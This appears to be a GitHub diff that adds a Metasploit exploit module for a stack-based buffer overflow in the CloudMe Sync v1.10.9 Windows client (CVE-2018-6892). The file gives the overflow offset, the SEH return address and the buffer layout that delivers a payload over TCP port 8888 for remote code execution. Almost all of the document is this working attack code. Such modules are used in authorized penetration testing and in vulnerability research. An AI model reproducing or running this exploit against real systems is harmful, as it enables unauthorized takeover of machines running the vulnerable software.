File tree Expand file tree Collapse file tree 1 file changed +69
-0
lines changed
modules/exploits/windows/misc Expand file tree Collapse file tree 1 file changed +69
-0
lines changed Original file line number Diff line number Diff line change
1
+ ##
2
+ # This module requires Metasploit: https://metasploit.com/download
3
+ # Current source: https://github.com/rapid7/metasploit-framework
4
+ ##
5
+
6
+ class MetasploitModule < Msf ::Exploit ::Remote
7
+ Rank = GreatRanking
8
+
9
+ include Msf ::Exploit ::Remote ::Tcp
10
+ include Msf ::Exploit ::Remote ::Seh
11
+
12
+ def initialize ( info = { } )
13
+ super ( update_info ( info ,
14
+ 'Name' => 'CloudMe Sync v1.10.9' ,
15
+ 'Description' => %q{
16
+ This module exploits a stack-based buffer overflow vulnerability
17
+ in CloudMe Sync v1.10.9 client application. This module has been
18
+ tested successfully on Windows 7 SP1 x86.
19
+ } ,
20
+ 'License' => MSF_LICENSE ,
21
+ 'Author' =>
22
+ [
23
+ 'hyp3rlinx' , # Original exploit author
24
+ 'Daniel Teixeira' # MSF module author
25
+ ] ,
26
+ 'References' =>
27
+ [
28
+ [ 'CVE' , '2018-6892' ] ,
29
+ [ 'EDB' , '44027' ] ,
30
+ ] ,
31
+ 'DefaultOptions' =>
32
+ {
33
+ 'EXITFUNC' => 'thread'
34
+ } ,
35
+ 'Platform' => 'win' ,
36
+ 'Payload' =>
37
+ {
38
+ 'BadChars' => "\x00 " ,
39
+ } ,
40
+ 'Targets' =>
41
+ [
42
+ [ 'CloudMe Sync v1.10.9' ,
43
+ {
44
+ 'Offset' => 2232 ,
45
+ 'Ret' => 0x61e7b7f6
46
+ }
47
+ ]
48
+ ] ,
49
+ 'Privileged' => true ,
50
+ 'DisclosureDate' => 'Jan 17 2018' ,
51
+ 'DefaultTarget' => 0 ) )
52
+
53
+ register_options ( [ Opt ::RPORT ( 8888 ) ] )
54
+
55
+ end
56
+
57
+ def exploit
58
+ connect
59
+
60
+ buffer = make_nops ( target [ 'Offset' ] )
61
+ buffer << generate_seh_record ( target . ret )
62
+ buffer << make_nops ( 10 )
63
+ buffer << payload . encoded
64
+ buffer << make_nops ( 5600 )
65
+
66
+ sock . put ( buffer )
67
+ handler
68
+ end
69
+ end
You can’t perform that action at this time.
0 commit comments